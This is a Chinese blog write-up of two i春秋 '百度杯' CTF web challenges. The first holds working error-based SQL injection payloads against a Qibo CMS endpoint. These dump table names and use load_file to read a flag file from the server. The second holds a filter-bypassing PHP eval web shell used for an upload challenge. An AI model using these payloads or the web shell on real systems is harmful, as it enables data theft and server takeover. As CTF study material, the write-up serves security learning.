i 春秋CTF题目 百度杯 9月场 再见CMS Upload 复现
今天花了点时间刷了下题目,遇到几道相对来说进阶的题目,学习一下储备一些CTF思路,这些题。。脑洞有点开。
目录
再见CMS
总结
Upload
绕过方法
总结
再见CMS
昨天刚做一道
[WEB攻防] i春秋- “百度杯”CTF比赛 十二月场-YeserCMS cmseasy CmsEasy_5.6_20151009 无限制报错注入 复现过程_AAAAAAAAAAAA66的博客-CSDN博客
今天继续按着套路来
直接在线CMS指纹识别
百度找到payload ,都是些过了很久的漏洞了
这里简单知道是一个注入漏洞就行了,我们的目的是照着payload修改找flag
POC
简单构造一下,
向http://localhost/qibov7/member/userinfo.php?job=edit&step=2
发送数据包:truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,
address=(select user()) where uid=38%23
需要修改的emali=123@qq.com 和 uid=38
其中emali 是我们注册时用的邮箱
uid:点击我们个人主页,uid可以看到
下面到了自己动手的地方了(使用HACKBAR)
url
http://2ee06f40f1b54ce6acda4e66b31973067b028d2008ca40d9.changame.ichunqiu.com/member/homepage.php/member/userinfo.php?job=edit&step=2
post
truename=xxxx%0000&Limitword[000]=&email=111@qq.com&provinceid= , address=(select version()) where uid = 3 %23
可以看到这里报错注入显示了 服务器版本,所以到这我们就复现成功了
接下来爆表 (利用where table_schema=database()不用爆库)
truename=xxxx%0000&Limitword[000]=&email=111@qq.com&provinceid= , address=(select group_concat(table_name) from information_schema.tables where table_schema=database()) where uid = 3 %23
太多表了,一个一个查太麻烦了。(这里面没flag)有一个提示
用dirsearch-master
那么就想办法用注入获取flag.php了
这里就要用到load_file函数了
MYSQL注入中load_file()函数的进一步应用_收集盒 Book box-CSDN博客
用16进制代表/var/www/html/flag.php
0x2f7661722f7777772f68746d6c2f666c61672e706870
最终payload
truename=111&Limitword[000]=&email=111@qq.com&provinceid=
, address=(select load_file(0x2f7661722f7777772f68746d6c2f666c61672e706870) ) where uid = 3 %23
最后在个人主页查看源码
搜索flag
总结
抓住了一个点就不要放,既然存在注入就一定要用注入获取到flag,如果获取不到,再去搜索其他的信息,最终一定要与注入结合,才能获取flag,不可能出题人引导你找到了一个漏洞却不让你用。
Upload
简单上传个一句话
点击上传成功看路径,没路径是没办法用蚁剑连接的。
绕过方法
上面我们分析,过滤了 <? php 这2个字符。 怎么绕过呢?
- php长标签 <script language="php"> 绕过<?
- 但是php 我们尝试大小写绕过 pHp
最终payload
<script language="pHp">@eval($_POST['xxx'])</script>
上传 ,蚁剑连接。
顺便也能在index.php看见了过滤的代码
<?phpif (is_uploaded_file($_FILES["file"]["tmp_name"])):$file = $_FILES['file'];$name = $file['name'];if (preg_match("/^[a-zA-Z0-9]+\\.[a-zA-Z0-9]+$/", $name) ):$data = file_get_contents($file['tmp_name']);while($next = preg_replace("/<\\?/", "", $data)){$next = preg_replace("/php/", "", $next);if($data === $next) break;$data = $next;}file_put_contents(dirname(__FILE__) . '/u/' . $name, $data);chmod(dirname(__FILE__) . '/u/' . $name, 0644);
?>
总结
这道题可以随便上传任意文件,但是对必要的一些php文件内容进行过滤,但是它给出了过滤的结果,想办法绕过过滤即可。
参考链接
[百度杯]九月场 再见CMS writeup_Flyour的博客-CSDN博客_再见cms
MYSQL注入中load_file()函数的进一步应用_收集盒 Book box-CSDN博客
“百度杯”CTF比赛 九月场——Web-Upload_Ifish的博客-CSDN博客
i 春秋CTF题目 百度杯 9月场 再见CMS Upload 复现相关推荐
- 2017 百度杯丶二月场第一周WP
1.祸起北荒 题目: 亿万年前 天子之子华夜,被父神之神末渊上神告知六荒十海之北荒西二旗即将发生一场"百度杯"的诸神之战 他作为天族的太子必须参与到此次诸神之战定六荒十海 华夜临危 ...
- i春秋百度杯CTF比赛2016年12月场writeup
第一场 传说中的签到题·进阶篇 题目: 没那么简单~ 11101100101000110011111011000 tips1:big num tips2: 496265176 二进制转十进制刚好和提示 ...
- 【wp】i春秋百度杯CTF比赛2016年12月场writeup
|@第一场 |-----@传说中的签到题·进阶篇 |-----@福尔摩斯 |-----@+ -- + |@第二场 |-----@一个十六岁的少年 |-----@藏在邮件头里的秘密 |-----@吃货 ...
- “百度杯”CTF比赛2017年2月场WP--web
一.爆破-1 在php语言中,所有的已经定义的变量都会保存在GLOBALS全局数组中,比方说你定义了一个$name="李华",那么$GLOBALS['name']就等于" ...
- 第一届“百度杯”信息安全攻防总决赛
第一届"百度杯"信息安全攻防总决赛(3月15-3月26) 比赛通道: 第一届"百度杯"信息安全攻防总决赛比赛通道 百度杯已经陪伴大家度过了七个月, 共计23场比 ...
- [WEB攻防] i春秋- “百度杯”CTF比赛 十二月场-YeserCMS cmseasy CmsEasy_5.6_20151009 无限制报错注入 复现过程
中华人民共和国网络安全法(出版物)_360百科 可以说一道经典的CTF题目,解这道题的过程类似于我们渗透测试的过程,所以把它放在了这个专栏,在这里我们详细讲过程,而不是原理. 目录 题目 寻找方向 f ...
- [i春秋]“百度杯”CTF比赛 十月场-Hash
前言 涉及知识点:反序列化.代码执行.命令执行 题目来自:i春秋 hash 如果i春秋题目有问题可以登录榆林学院信息安全协会CTF平台使用 或者利用本文章提供的源码自主复现 [i春秋]"百 ...
- 百度杯CTF Write up集锦 WEB篇
九月场 1.code 一开始的URL为 http://ace3c302efed4a9094cbac1dff0250e8add1b4b45f8249d4.game.ichunqiu.com/index. ...
- “百度杯”CTF比赛 2017 二月场 wp
目录 爆破-1 爆破-2 爆破-3 include Zone OneThink misc 2 上古神器 爆破-1 flag在一个长度为6的变量里面 <?php include "fla ...
最新文章
- AI也能「抽象派」作画,圆形+方块组合,可微2D渲染下生成抽象人脸
- linux c/c++
- ORA-01506: missing or illegal database name
- SAP Spartacus里的标准Banner设计
- 华科的计算机和建筑学哪个强,华中科技大学和华南理工大学相比,谁更占优势?看了也许就知道了...
- 1-1圆柱体的表面积(算法竞赛入门经典)
- 【转】使用PowerApps快速构建基于主题的轻业务应用 —— 进阶篇
- GoldenGate 12.3 MA架构介绍系列(4)–Restful API介绍
- 下载Eclipse IDE
- thrift实战教程
- Excel表格合并单元格丢失边框
- 5A成绩通过PMP,备考经验总结——姜飞
- Linux 创建一个简单的私有CA、发证、吊销证书
- 【性能策略】限流策略
- 基于C++的坦克动荡游戏
- 交换机二三层转发原理简单总结
- 高级软件工程师要掌握的技能
- 水经注有哪些单款地图下载器授权?
- 网站web服务器分析小程序
- java 基本数据类型_Java语言的八种基本数据类型介绍
热门文章
- Screen coordinate and Client Coordinat
- 什么是归一化,它与标准化的区别是什么?
- jstl标签c:choose,c:when,c:otherwise用法
- USB Full-Speed 基础波形
- 刘群:基于深度学习的自然语言处理,边界在哪里?
- 该结束这忙忙碌碌却又碌碌无为的生活了
- 重温乔布斯在斯坦福大学的经典演讲------Stay Hungry, Stay Foolish
- 9岁有赞:新零售业务快速增长 推新品牌扶持计划
- BIM模型文件下载——某加油站服务区Revit模型
- lucene Lucene Spatial